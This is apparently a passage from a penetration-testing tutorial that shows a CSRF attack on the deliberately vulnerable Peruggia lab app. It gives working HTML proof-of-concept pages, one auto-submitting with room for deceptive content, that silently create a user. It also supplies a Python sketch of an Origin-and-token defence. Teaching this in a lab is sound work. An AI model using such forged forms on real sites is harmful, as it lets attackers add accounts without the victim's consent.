Exploiting CSRF in a POST request

In this section, we will focus on exploiting a POST request. We will use Peruggia's user-creation functionality for this exercise. The first step is to understand how the request you want to replicate works: if you log in to Peruggia as admin and create a new user while capturing the traffic with Burp Suite, you can see that the request appears as follows:

The request only includes the newuser (username) and newuserpass (password) parameters. Thus, once the request and parameters that make the change are identified, we need to do the following:

  1. Create an HTML page that generates the request with those parameters and the information that you want to use.
  2. Convince the user to browse to your page and submit the request. The latter may not be necessary, as you can have the page autosubmit the form.

An HTML page like the following is enough to accomplish our objective. In this example, the vulnerable server is 10.7.7.5:

<html>
  <body>
    <form method="POST" action="http://10.7.7.5/peruggia/index.php?action=account&adduser=1">
      <input type="text" value="CSRFuser" name="newuser">
      <input type="text" value="password123!" name="newuserpass">
      <input type="submit" value="Submit">
    </form>
  </body>
</html>

The resulting page will look like the following screenshot. The bottom section is the Firefox developer tools panel, which can be opened with the F12 key:

In a regular penetration test, this may work as proof of concept (PoC) and be enough to demonstrate the existence of a vulnerability. A more sophisticated version could include deceptive content and script code to autosubmit the request once the page is loaded:

<html>
  <body>
    ...
    <!-- include attractive HTML content here -->
    ...
    <form id="csrf" method="POST" action="http://10.7.7.5/peruggia/index.php?action=account&adduser=1">
      <input type="text" value="CSRFuser" name="newuser">
      <input type="text" value="password123!" name="newuserpass">
      <input type="submit" value="Submit">
    </form>
    <script>document.getElementById("csrf").submit();</script>
  </body>
</html>

To test this PoC page, open Peruggia, start a session with the admin user (password: admin), and then load the attacking page in a different tab or window of the same browser:

Next, click the Submit button (or, if using the scripted version, simply load the page) and the request will be processed by the server as if it had been sent by an authenticated user. Using the browser's developer tools, you can confirm that the request was sent to the target server and processed successfully:
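The forged request succeeds because the browser attaches the admin's session cookie on its own and the server checks nothing that a foreign page cannot supply. As an added example, not the book's or Peruggia's code, the following Python sketch models the add-user handler in both states: with no check (the behaviour exploited above) and with an Origin comparison plus a session-bound token, which rejects the PoC form while accepting a legitimate submission. The Session class, the handler name and the attacker origin are hypothetical; the server address and form fields are the ones from the page.

```python
import hmac
import secrets

# Origin of the vulnerable application from the page; any other origin is foreign.
APP_ORIGIN = "http://10.7.7.5"


class Session:
    """Hypothetical server-side session: a logged-in user plus a per-session CSRF token."""

    def __init__(self, user):
        self.user = user
        self.csrf_token = secrets.token_hex(16)


def handle_adduser(session, form, headers, check_csrf=True):
    """Model of the action=account&adduser=1 handler (hypothetical, not Peruggia's code).
    check_csrf=False reproduces the vulnerable behaviour: only the session cookie counts,
    so a form posted from a foreign page is accepted.  Returns (status, reason)."""
    if session is None or session.user != "admin":
        return 403, "not authenticated as admin"
    if check_csrf:
        # Browsers add an Origin header to cross-site POSTs; if present it must match.
        origin = headers.get("Origin")
        if origin is not None and origin != APP_ORIGIN:
            return 403, "cross-origin request rejected"
        # Some clients omit Origin, so the token bound to the session is mandatory too.
        token = form.get("csrf_token", "")
        if not hmac.compare_digest(token, session.csrf_token):
            return 403, "missing or invalid CSRF token"
    return 200, "user %s created" % form["newuser"]


def simulate():
    """Run the forged request from the PoC page against both handler variants."""
    admin = Session("admin")                      # admin is logged in, as in the walkthrough
    forged = {"newuser": "CSRFuser", "newuserpass": "password123!"}  # the PoC form fields
    foreign = {"Origin": "http://attacker.test"}  # constructed: where the PoC page is hosted
    legit = dict(forged, csrf_token=admin.csrf_token)  # same fields plus the session token
    return {
        "vulnerable": handle_adduser(admin, forged, foreign, check_csrf=False)[0],
        "hardened_forged": handle_adduser(admin, forged, foreign)[0],
        "hardened_no_origin": handle_adduser(admin, forged, {})[0],
        "hardened_legit": handle_adduser(admin, legit, {"Origin": APP_ORIGIN})[0],
    }


if __name__ == "__main__":
    print(simulate())
```

Running it prints 200 for the vulnerable handler and for the legitimate tokened request, and 403 for the forged form with or without an Origin header.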
